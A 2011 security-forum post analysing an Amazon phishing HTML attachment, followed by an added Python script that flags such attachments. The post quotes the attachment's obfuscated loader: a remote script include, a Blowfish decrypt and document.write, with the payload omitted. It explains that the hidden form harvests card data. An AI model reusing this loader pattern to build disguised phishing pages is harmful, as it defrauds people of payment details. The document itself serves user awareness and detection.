Security-X

Security-X Forum => General Security => Topic started by: igor51 on December 11, 2011, 14:22:37

Title: [Phishing] Amazon
Posted by: igor51 on December 11, 2011, 14:22:37
Phishing example: Amazon

This phishing attempt was reported to us by JPL (http://forums.futura-sciences.com/members/1676-jpl.html), moderator and editor at Futura-Sciences.com.

He received by e-mail, as an attachment, an HTML file containing the following code.

<html><head><script src='http://html-encrypter.googlecode.com/svn/trunk/hea1.js'></script><script>var hea1p = new Blowfish('0123456789?@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz');var hea1t = hea1p.decrypt[... encrypted payload omitted ...]document.write(hea1t)</script></head></html>
Once decrypted, here is the result. We decided to show the result to illustrate our point.

(https://forum.security-x.fr/proxy.php?request=http%3A%2F%2Fsecurity-x.fr%2Fimg%2Fpublic%2Fphishing.jpg&hash=fda49cd99bf1d7f76af2903921cecca904db9d2a)

A technical description: http://www.spywareremove.com/removetrojphishaz.html

A quick analysis on VirusTotal returns only a few results: http://www.virustotal.com/file-scan/report.html?id=4fd99cdd03453a637cb02ac96b781cf2b479785d0aa2ffbd90ca928514969577-1323201894

As can be seen in the image, the page asks you to fill in a whole range of information, including your card number and its security code.

Neither a bank nor an e-commerce site will ever ask you for this information by e-mail.

Pay attention to the information you are asked for!
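
A static triage check for HTML attachments built like the one quoted in the post above (a remote script include, a decrypt call, then document.write), given as an added example that is not part of the original post. The function and class names, the list of decoder calls and both sample attachments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Calls often used to rebuild a hidden page at load time (assumed list, extend as needed).
DECODERS = re.compile(r"\b(?:\w+\.)?(decrypt|unescape|atob|fromCharCode|eval)\s*\(", re.I)
DOC_WRITE = re.compile(r"document\.write(?:ln)?\s*\(", re.I)

class AttachmentScan(HTMLParser):
    """Collects remote script URLs, inline script text and visible text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.remote_scripts, self.inline_js, self.visible = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src and re.match(r"(?i)(https?:)?//", src):
                self.remote_scripts.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.inline_js if self._in_script else self.visible).append(data)

def triage(html):
    """Return the list of heuristic findings for one HTML attachment."""
    scan = AttachmentScan()
    scan.feed(html)
    scan.close()
    js = "\n".join(scan.inline_js)
    findings = []
    if scan.remote_scripts:                      # code fetched from a third-party host
        findings.append("remote-script")
    if DOC_WRITE.search(js) and DECODERS.search(js):
        findings.append("decode-then-write")     # page body only exists after decoding
    if js.strip() and not "".join(scan.visible).strip():
        findings.append("no-static-content")     # nothing for a content filter to read
    return findings

# Constructed samples: same shape as the attachment in the post, placeholder key and payload.
SUSPECT = ("<html><head><script src='http://example.invalid/dec.js'></script>"
           "<script>var p = new Blowfish('k');var t = p.decrypt('00ff');"
           "document.write(t)</script></head></html>")
BENIGN = "<html><body><h1>Invoice</h1><script>console.log('ready')</script></body></html>"

if __name__ == "__main__":
    print(triage(SUSPECT), triage(BENIGN))
```

The three findings together explain why the post reports so few antivirus detections: the form that asks for card data is not present in the file until the script runs.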